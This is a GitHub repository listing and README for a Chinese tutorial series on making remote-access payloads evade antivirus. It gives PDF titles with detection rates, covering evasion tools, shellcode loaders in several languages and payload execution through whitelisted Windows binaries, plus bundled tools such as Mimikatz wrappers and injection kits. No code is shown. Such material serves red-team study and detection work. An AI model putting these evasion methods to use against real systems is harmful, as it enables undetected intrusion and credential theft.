Repository file tree:

├── 01.远控免杀专题(1)-基础篇.pdf
├── 02.远控免杀专题(2)-msfvenom隐藏的参数.pdf
├── 03.远控免杀专题(3)-msf自带免杀(VT免杀率35-69).pdf
├── 04.远控免杀专题(4)-Evasion模块免杀(VT免杀率12-71).pdf
├── 05.远控免杀专题(5)-Veil免杀(VT免杀率23-71).pdf
├── 06.远控免杀专题(6)-Venom免杀(VT免杀率11-71).pdf
├── 07.远控免杀专题(7)-Shellter免杀(VT免杀率7-69).pdf
├── 08.远控免杀专题(8)-BackDoor-Factory免杀(VT免杀率13-71).pdf
├── 09.远控免杀专题(9)-Avet免杀(VT免杀率17-71).pdf
├── 10.远控免杀专题(10)-TheFatRat免杀(VT免杀率22-70).pdf
├── 11.远控免杀专题(11)-Avoidz免杀(VT免杀率23-71).pdf
├── 12.远控免杀专题(12)-Green-Hat-Suite免杀(VT免杀率23-70).pdf
├── 13.远控免杀专题(13)-zirikatu免杀(VT免杀率39-71).pdf
├── 14.远控免杀专题(14)-AVIator免杀(VT免杀率25-69).pdf
├── 15.远控免杀专题(15)-DKMC免杀(VT免杀率8-55).pdf
├── 16.远控免杀专题(16)-Unicorn免杀(VT免杀率29-56).pdf
├── 17.远控免杀专题(17)-Python-Rootkit免杀(VT免杀率7-70).pdf
├── 18.远控免杀专题(18)-ASWCrypter免杀(VT免杀率19-57).pdf
├── 19.远控免杀专题(19)-nps_payload免杀(VT免杀率3-57).pdf
├── 20.远控免杀专题(20)-GreatSCT免杀(VT免杀率14-56).pdf
├── 21.远控免杀专题(21)-HERCULES免杀(VT免杀率29-70).pdf
├── 22.远控免杀专题(22)-SpookFlare免杀(VT免杀率16-67).pdf
├── 23.远控免杀专题(23)-SharpShooter免杀(VT免杀率22-57).pdf
├── 24.远控免杀专题(24)-CACTUSTORCH免杀(VT免杀率23-57).pdf
├── 25.远控免杀专题(25)-Winpayloads免杀(VT免杀率18-70).pdf
├── 26.远控免杀专题(26)-C、C++加载shellcode免杀(上)(VT免杀率9-70).pdf
├── 27.远控免杀专题(27)-C、C++加载shellcode免杀(中)(VT免杀率8-70).pdf
├── 28.远控免杀专题(28)-C、C++加载shellcode免杀(下)(VT免杀率3-71).pdf
├── 29.远控免杀专题(29)-C#加载shellcode免杀-5种方式(VT免杀率8-70).pdf
├── 30.远控免杀专题(30)-Python加载shellcode免杀-8种方式(VT免杀率10-69).pdf
├── 31.远控免杀专题(31)-powershell加载shellcode免杀-4种方式(VT免杀率5-58).pdf
├── 32.远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70).pdf
├── 33.远控免杀专题(33)-Ruby加载shellcode免杀(VT免杀率0-58).pdf
├── 34.远控免杀专题(34)-白名单MSBuild.exe执行payload(VT免杀率4-57).pdf
├── 35.远控免杀专题(35)-白名单Msiexec.exe执行payload(VT免杀率27-60).pdf
├── 36.远控免杀专题(36)-白名单InstallUtil.exe执行payload(VT免杀率3-68).pdf
├── 37.远控免杀专题(37)-白名单Mshta.exe执行payload(VT免杀率26-58).pdf
├── 38.远控免杀专题(38)-白名单Rundll32.exe执行payload(VT免杀率22-58).pdf
├── 39.远控免杀专题(39)-白名单Regsvr32.exe执行payload(VT免杀率18-58).pdf
├── 40.远控免杀专题(40)-白名单Cmstp.exe执行payload(VT查杀率为21-57).pdf
├── 41.远控免杀专题(41)-白名单Ftp.exe执行payload.pdf
├── 42.远控免杀专题(42)-白名单Regasm.exe-Regsvcs.exe执行payload.pdf
├── 43.远控免杀专题(43)-白名单Compiler.exe执行payload.pdf
├── 44.远控免杀专题(44)-白名单MavInject.exe执行payload.pdf
├── 45.远控免杀专题(45)-白名单presentationhost.exe执行payload.pdf
├── 46.远控免杀专题(46)-白名单IEexec.exe执行payload.pdf
├── 47.远控免杀专题(47)-白名单winrm.vbs、slmgr.vbs执行payload.pdf
├── 48.远控免杀专题(48)-白名单pubprn.vbs执行payload.pdf
├── 49.远控免杀专题(49)-白名单Xwizard.exe执行payload.pdf
├── 50.远控免杀专题(50)-白名单winword.exe执行payload.pdf
├── 51.远控免杀专题(51)-白名单msdeloy.exe执行payload.pdf
├── 52.远控免杀专题(52)-白名单psexec.exe执行payload.pdf
├── 53.远控免杀专题(53)-白名单WMIC.exe执行payload.pdf
├── 54.远控免杀专题(54)-白名单SyncAppvPublishingServer.vbs执行payload.pdf
├── 55.远控免杀专题(55)-白名单Pcalua.exe执行payload.pdf
├── 56.远控免杀专题(56)-白名单zipfldr.dll执行payload.pdf
├── 57.远控免杀专题(57)-白名单Url.dll执行payload.pdf
├── 58.远控免杀专题(58)-白名单DiskShadow.exe执行payload.pdf
├── 59.远控免杀专题(59)-白名单Odbcconf.exe执行payload.pdf
├── 60.远控免杀专题(60)-白名单Forfiles.exe执行payload.pdf
├── 61.远控免杀专题(61)-白名单Te.exe执行payload.pdf
├── 62.远控免杀专题(62)-白名单CScript.exe-WScript.exe执行payload.pdf
├── 63.远控免杀专题(63)-白名单InfDefaultInstall.exe执行payload.pdf
├── 64.远控免杀专题(64)-Msf自编译免杀补充.pdf
├── 65.远控免杀专题(65)-shellcode免杀实践.pdf
├── 66.远控免杀专题(66)-工具篇总结.pdf
├── 67.远控免杀专题(67)-白名单篇总结.pdf
├── 68.远控免杀专题(68)-Mimikatz免杀实践(上).pdf
├── 69.远控免杀专题(69)-Mimikatz免杀实践(下).pdf
├── 70.远控免杀专题(70)-终结篇.pdf
├── 71.远控免杀专题(71)-Donut免杀任意可执行文件(VT免杀率30-67).pdf
├── 72.远控免杀专题(72)-sRDI反射型DLL注入免杀(VT查杀率16-61).pdf
├── 73.远控免杀专题(73)-使用stager.dll的多种免杀方式(VT查杀率7-72).pdf
├── 74.远控免杀专题(74)-基于Go的条件触发式免杀(VT查杀率7-70).pdf
├── 75.远控免杀专题(75)-基于Go的沙箱检测(VT查杀率8-70).pdf
├── 76.远控免杀专题(76)-基于Go的各种API免杀测试.pdf
├── 77.远控免杀专题(77)-基于Go的免杀小结.pdf
├── README.md
├── images
│   ├── 0.png
│   ├── ewm.png
│   ├── msnl01.png
│   ├── msnl02.png
│   ├── tide.png
│   └── tide2.png
└── tools
    ├── AVIator.zip
    ├── DotNetToJScript.zip
    ├── InstallUtil-Shellcode.cs
    ├── Invoke-Obfuscation.zip
    ├── ProcessInjection.zip
    ├── ReflectiveDLLInjection.zip
    ├── SharpCradle.zip
    ├── ShellcodeWrapper.zip
    ├── SimpleShellcodeInjector.zip
    ├── Veil-Catapult.tar.gz
    ├── Win恶意软件行为分析工具
    │   ├── Autoruns_v13.7.zip
    │   ├── IceSword122cn.zip
    │   ├── PCHunter_free_1.51.zip
    │   ├── PowerToolx32_v4.8.zip
    │   ├── PowerToolx64_v2.0.zip
    │   ├── ProcessExplorer_v16.20.zip
    │   ├── ProcessMonitor_v3.32.zip
    │   ├── Win64AST_1.10Beta7.zip
    │   └── 火绒剑独立版 0.1.0.36.zip
    ├── avet.tar.gz
    ├── bat2exe.zip
    ├── bin2hex.exe
    ├── cmstp.inf
    ├── donut_v0.9.2_release.zip
    ├── encode_shellcode.py
    ├── go-shellcode.zip
    ├── green-hat-suite.tar.gz
    ├── gsl-sc-loader.zip
    ├── impacket.tar.gz
    ├── mimikatz
    │   ├── Convert-BinaryToString.ps1
    │   ├── Invoke-Mimikatz.ps1
    │   ├── Invoke-ReflectivePEInjection.ps1
    │   ├── Out-EncryptedScript.ps1
    │   ├── ResHacker.zip
    │   ├── executes-mimikatz.xml
    │   ├── katz.cs
    │   ├── mimikatz.js
    │   ├── mimikatz.msi
    │   ├── mimikatz.sct
    │   ├── mimikatz.xsl
    │   ├── mimikatz_trunk_2.2.0.zip
    │   ├── procdump.exe
    │   ├── procdump64.exe
    │   ├── shellcode_inject.rb
    │   ├── sigthief.py
    │   └── xencrypt.ps1
    ├── mingw-w64-install.exe
    ├── msfvenom-zsh-completion.tar.gz
    ├── pe_to_shellcode.zip
    ├── powersct.sct
    ├── py2exe-0.6.9.win32-py2.7.exe
    ├── pyinstaller-3.5.zip
    ├── sRDI.zip
    ├── shellcode_launcher.zip
    ├── stager.dll.zip
    ├── unicorn.tar.gz
    ├── zirikatu.tar.gz
    └── 自动化dll注入工具-Dll(IAT).exe.zip

Raw file URLs (one per repository file, commit b12d39889bede1288f20f574d0f7a5bcd805c8da):

/01.远控免杀专题(1)-基础篇.pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/01.远控免杀专题(1)-基础篇.pdf

/02.远控免杀专题(2)-msfvenom隐藏的参数.pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/02.远控免杀专题(2)-msfvenom隐藏的参数.pdf

/03.远控免杀专题(3)-msf自带免杀(VT免杀率35-69).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/03.远控免杀专题(3)-msf自带免杀(VT免杀率35-69).pdf
/04.远控免杀专题(4)-Evasion模块免杀(VT免杀率12-71).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/04.远控免杀专题(4)-Evasion模块免杀(VT免杀率12-71).pdf

/05.远控免杀专题(5)-Veil免杀(VT免杀率23-71).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/05.远控免杀专题(5)-Veil免杀(VT免杀率23-71).pdf

/06.远控免杀专题(6)-Venom免杀(VT免杀率11-71).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/06.远控免杀专题(6)-Venom免杀(VT免杀率11-71).pdf

/07.远控免杀专题(7)-Shellter免杀(VT免杀率7-69).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/07.远控免杀专题(7)-Shellter免杀(VT免杀率7-69).pdf

/08.远控免杀专题(8)-BackDoor-Factory免杀(VT免杀率13-71).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/08.远控免杀专题(8)-BackDoor-Factory免杀(VT免杀率13-71).pdf

/09.远控免杀专题(9)-Avet免杀(VT免杀率17-71).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/09.远控免杀专题(9)-Avet免杀(VT免杀率17-71).pdf

/10.远控免杀专题(10)-TheFatRat免杀(VT免杀率22-70).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/10.远控免杀专题(10)-TheFatRat免杀(VT免杀率22-70).pdf

/11.远控免杀专题(11)-Avoidz免杀(VT免杀率23-71).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/11.远控免杀专题(11)-Avoidz免杀(VT免杀率23-71).pdf

/12.远控免杀专题(12)-Green-Hat-Suite免杀(VT免杀率23-70).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/12.远控免杀专题(12)-Green-Hat-Suite免杀(VT免杀率23-70).pdf

/13.远控免杀专题(13)-zirikatu免杀(VT免杀率39-71).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/13.远控免杀专题(13)-zirikatu免杀(VT免杀率39-71).pdf

/14.远控免杀专题(14)-AVIator免杀(VT免杀率25-69).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/14.远控免杀专题(14)-AVIator免杀(VT免杀率25-69).pdf

/15.远控免杀专题(15)-DKMC免杀(VT免杀率8-55).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/15.远控免杀专题(15)-DKMC免杀(VT免杀率8-55).pdf

/16.远控免杀专题(16)-Unicorn免杀(VT免杀率29-56).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/16.远控免杀专题(16)-Unicorn免杀(VT免杀率29-56).pdf

/17.远控免杀专题(17)-Python-Rootkit免杀(VT免杀率7-70).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/17.远控免杀专题(17)-Python-Rootkit免杀(VT免杀率7-70).pdf

/18.远控免杀专题(18)-ASWCrypter免杀(VT免杀率19-57).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/18.远控免杀专题(18)-ASWCrypter免杀(VT免杀率19-57).pdf

/19.远控免杀专题(19)-nps_payload免杀(VT免杀率3-57).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/19.远控免杀专题(19)-nps_payload免杀(VT免杀率3-57).pdf

/20.远控免杀专题(20)-GreatSCT免杀(VT免杀率14-56).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/20.远控免杀专题(20)-GreatSCT免杀(VT免杀率14-56).pdf

/21.远控免杀专题(21)-HERCULES免杀(VT免杀率29-70).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/21.远控免杀专题(21)-HERCULES免杀(VT免杀率29-70).pdf

/22.远控免杀专题(22)-SpookFlare免杀(VT免杀率16-67).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/22.远控免杀专题(22)-SpookFlare免杀(VT免杀率16-67).pdf

/23.远控免杀专题(23)-SharpShooter免杀(VT免杀率22-57).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/23.远控免杀专题(23)-SharpShooter免杀(VT免杀率22-57).pdf

/24.远控免杀专题(24)-CACTUSTORCH免杀(VT免杀率23-57).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/24.远控免杀专题(24)-CACTUSTORCH免杀(VT免杀率23-57).pdf

/25.远控免杀专题(25)-Winpayloads免杀(VT免杀率18-70).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/25.远控免杀专题(25)-Winpayloads免杀(VT免杀率18-70).pdf

/26.远控免杀专题(26)-C、C++加载shellcode免杀(上)(VT免杀率9-70).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/26.远控免杀专题(26)-C、C++加载shellcode免杀(上)(VT免杀率9-70).pdf

/27.远控免杀专题(27)-C、C++加载shellcode免杀(中)(VT免杀率8-70).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/27.远控免杀专题(27)-C、C++加载shellcode免杀(中)(VT免杀率8-70).pdf

/28.远控免杀专题(28)-C、C++加载shellcode免杀(下)(VT免杀率3-71).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/28.远控免杀专题(28)-C、C++加载shellcode免杀(下)(VT免杀率3-71).pdf

/29.远控免杀专题(29)-C#加载shellcode免杀-5种方式(VT免杀率8-70).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/29.远控免杀专题(29)-C#加载shellcode免杀-5种方式(VT免杀率8-70).pdf

/30.远控免杀专题(30)-Python加载shellcode免杀-8种方式(VT免杀率10-69).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/30.远控免杀专题(30)-Python加载shellcode免杀-8种方式(VT免杀率10-69).pdf

/31.远控免杀专题(31)-powershell加载shellcode免杀-4种方式(VT免杀率5-58).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/31.远控免杀专题(31)-powershell加载shellcode免杀-4种方式(VT免杀率5-58).pdf

/32.远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/32.远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70).pdf

/33.远控免杀专题(33)-Ruby加载shellcode免杀(VT免杀率0-58).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/33.远控免杀专题(33)-Ruby加载shellcode免杀(VT免杀率0-58).pdf

/34.远控免杀专题(34)-白名单MSBuild.exe执行payload(VT免杀率4-57).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/34.远控免杀专题(34)-白名单MSBuild.exe执行payload(VT免杀率4-57).pdf

/35.远控免杀专题(35)-白名单Msiexec.exe执行payload(VT免杀率27-60).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/35.远控免杀专题(35)-白名单Msiexec.exe执行payload(VT免杀率27-60).pdf

/36.远控免杀专题(36)-白名单InstallUtil.exe执行payload(VT免杀率3-68).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/36.远控免杀专题(36)-白名单InstallUtil.exe执行payload(VT免杀率3-68).pdf

/37.远控免杀专题(37)-白名单Mshta.exe执行payload(VT免杀率26-58).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/37.远控免杀专题(37)-白名单Mshta.exe执行payload(VT免杀率26-58).pdf

/38.远控免杀专题(38)-白名单Rundll32.exe执行payload(VT免杀率22-58).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/38.远控免杀专题(38)-白名单Rundll32.exe执行payload(VT免杀率22-58).pdf

/39.远控免杀专题(39)-白名单Regsvr32.exe执行payload(VT免杀率18-58).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/39.远控免杀专题(39)-白名单Regsvr32.exe执行payload(VT免杀率18-58).pdf

/40.远控免杀专题(40)-白名单Cmstp.exe执行payload(VT查杀率为21-57).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/40.远控免杀专题(40)-白名单Cmstp.exe执行payload(VT查杀率为21-57).pdf

/41.远控免杀专题(41)-白名单Ftp.exe执行payload.pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/41.远控免杀专题(41)-白名单Ftp.exe执行payload.pdf

/42.远控免杀专题(42)-白名单Regasm.exe-Regsvcs.exe执行payload.pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/42.远控免杀专题(42)-白名单Regasm.exe-Regsvcs.exe执行payload.pdf

/43.远控免杀专题(43)-白名单Compiler.exe执行payload.pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/43.远控免杀专题(43)-白名单Compiler.exe执行payload.pdf

/44.远控免杀专题(44)-白名单MavInject.exe执行payload.pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/44.远控免杀专题(44)-白名单MavInject.exe执行payload.pdf

/45.远控免杀专题(45)-白名单presentationhost.exe执行payload.pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/45.远控免杀专题(45)-白名单presentationhost.exe执行payload.pdf

/46.远控免杀专题(46)-白名单IEexec.exe执行payload.pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/46.远控免杀专题(46)-白名单IEexec.exe执行payload.pdf

/47.远控免杀专题(47)-白名单winrm.vbs、slmgr.vbs执行payload.pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/47.远控免杀专题(47)-白名单winrm.vbs、slmgr.vbs执行payload.pdf

/48.远控免杀专题(48)-白名单pubprn.vbs执行payload.pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/48.远控免杀专题(48)-白名单pubprn.vbs执行payload.pdf

/49.远控免杀专题(49)-白名单Xwizard.exe执行payload.pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/49.远控免杀专题(49)-白名单Xwizard.exe执行payload.pdf

/50.远控免杀专题(50)-白名单winword.exe执行payload.pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/50.远控免杀专题(50)-白名单winword.exe执行payload.pdf

/51.远控免杀专题(51)-白名单msdeloy.exe执行payload.pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/51.远控免杀专题(51)-白名单msdeloy.exe执行payload.pdf

/52.远控免杀专题(52)-白名单psexec.exe执行payload.pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/52.远控免杀专题(52)-白名单psexec.exe执行payload.pdf

/53.远控免杀专题(53)-白名单WMIC.exe执行payload.pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/53.远控免杀专题(53)-白名单WMIC.exe执行payload.pdf

/54.远控免杀专题(54)-白名单SyncAppvPublishingServer.vbs执行payload.pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/54.远控免杀专题(54)-白名单SyncAppvPublishingServer.vbs执行payload.pdf

/55.远控免杀专题(55)-白名单Pcalua.exe执行payload.pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/55.远控免杀专题(55)-白名单Pcalua.exe执行payload.pdf

/56.远控免杀专题(56)-白名单zipfldr.dll执行payload.pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/56.远控免杀专题(56)-白名单zipfldr.dll执行payload.pdf

/57.远控免杀专题(57)-白名单Url.dll执行payload.pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/57.远控免杀专题(57)-白名单Url.dll执行payload.pdf

/58.远控免杀专题(58)-白名单DiskShadow.exe执行payload.pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/58.远控免杀专题(58)-白名单DiskShadow.exe执行payload.pdf

/59.远控免杀专题(59)-白名单Odbcconf.exe执行payload.pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/59.远控免杀专题(59)-白名单Odbcconf.exe执行payload.pdf

/60.远控免杀专题(60)-白名单Forfiles.exe执行payload.pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/60.远控免杀专题(60)-白名单Forfiles.exe执行payload.pdf

/61.远控免杀专题(61)-白名单Te.exe执行payload.pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/61.远控免杀专题(61)-白名单Te.exe执行payload.pdf

/62.远控免杀专题(62)-白名单CScript.exe-WScript.exe执行payload.pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/62.远控免杀专题(62)-白名单CScript.exe-WScript.exe执行payload.pdf

/63.远控免杀专题(63)-白名单InfDefaultInstall.exe执行payload.pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/63.远控免杀专题(63)-白名单InfDefaultInstall.exe执行payload.pdf

/64.远控免杀专题(64)-Msf自编译免杀补充.pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/64.远控免杀专题(64)-Msf自编译免杀补充.pdf

/65.远控免杀专题(65)-shellcode免杀实践.pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/65.远控免杀专题(65)-shellcode免杀实践.pdf

/66.远控免杀专题(66)-工具篇总结.pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/66.远控免杀专题(66)-工具篇总结.pdf

/67.远控免杀专题(67)-白名单篇总结.pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/67.远控免杀专题(67)-白名单篇总结.pdf

/68.远控免杀专题(68)-Mimikatz免杀实践(上).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/68.远控免杀专题(68)-Mimikatz免杀实践(上).pdf

/69.远控免杀专题(69)-Mimikatz免杀实践(下).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/69.远控免杀专题(69)-Mimikatz免杀实践(下).pdf

/70.远控免杀专题(70)-终结篇.pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/70.远控免杀专题(70)-终结篇.pdf

/71.远控免杀专题(71)-Donut免杀任意可执行文件(VT免杀率30-67).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/71.远控免杀专题(71)-Donut免杀任意可执行文件(VT免杀率30-67).pdf

/72.远控免杀专题(72)-sRDI反射型DLL注入免杀(VT查杀率16-61).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/72.远控免杀专题(72)-sRDI反射型DLL注入免杀(VT查杀率16-61).pdf

/73.远控免杀专题(73)-使用stager.dll的多种免杀方式(VT查杀率7-72).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/73.远控免杀专题(73)-使用stager.dll的多种免杀方式(VT查杀率7-72).pdf

/74.远控免杀专题(74)-基于Go的条件触发式免杀(VT查杀率7-70).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/74.远控免杀专题(74)-基于Go的条件触发式免杀(VT查杀率7-70).pdf

/75.远控免杀专题(75)-基于Go的沙箱检测(VT查杀率8-70).pdf: https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/75.远控免杀专题(75)-基于Go的沙箱检测(VT查杀率8-70).pdf

/76.远控免杀专题(76)-基于Go的各种API免杀测试.pdf:
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/76.远控免杀专题(76)-基于Go的各种API免杀测试.pdf

/77.远控免杀专题(77)-基于Go的免杀小结.pdf:
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/77.远控免杀专题(77)-基于Go的免杀小结.pdf

/README.md:

# BypassAntiVirus

**This series is original work by `重剑无锋`, a member of the Tide security team. Please credit the source when reposting!**

**Solemn statement: the techniques, ideas and tools covered in these articles are provided only for security-oriented study and exchange. Nobody may use them for illegal purposes or for profit; anyone who does so bears the consequences!**

**Online library for this series: [http://wiki.tidesec.com/docs/bypassav](http://wiki.tidesec.com/docs/bypassav)**

**潮影 online AV-evasion platform: [http://bypass.tidesec.com/](http://bypass.tidesec.com/)**

---

I have mostly worked on web security and have done a little research into WAF bypass, but my understanding of RAT anti-virus evasion was stuck roughly in the era of ASPack/UPX packing and locating and patching signatures. Over the past two years, with more HW exercises and red-vs-blue engagements, I have been exposed to more and more privilege escalation, intranet penetration and domain penetration. Whether attack capability has improved I cannot say, but defensive capability has clearly gone up a big notch. Leaving aside the skill level of the defenders, at the very least far more cloud WAFs, firewalls and isolation devices are deployed, and servers are often found running anti-virus, software WAFs, agents and so on; one particular "number-named" AV product is especially widespread on domestic servers. In this situation, not knowing a little evasion technique puts you at a real disadvantage.

But web people generally are not very familiar with reverse engineering and binaries, and even compiling and running other people's code is a chore, so the only option is to rely on ready-made tools as a workaround. To that end I collected about 20 fairly well-known evasion tools from the internet, studied their evasion principles and tested their effectiveness, then learned the various ways of compiling and loading shellcode in different languages, and added some common uses of whitelisted programs to load payloads. That is how this series of articles on RAT evasion came about.

- **Tools section**: msf built-in evasion, Veil, Venom, Shellter, BackDoor-Factory, Avet, TheFatRat, Avoidz, Green-Hat-Suite, zirikatu, AVIator, DKMC, Unicorn, Python-Rootkit, ASWCrypter, nps_payload, GreatSCT, HERCULES, SpookFlare, SharpShooter, CACTUSTORCH, Winpayload and others.

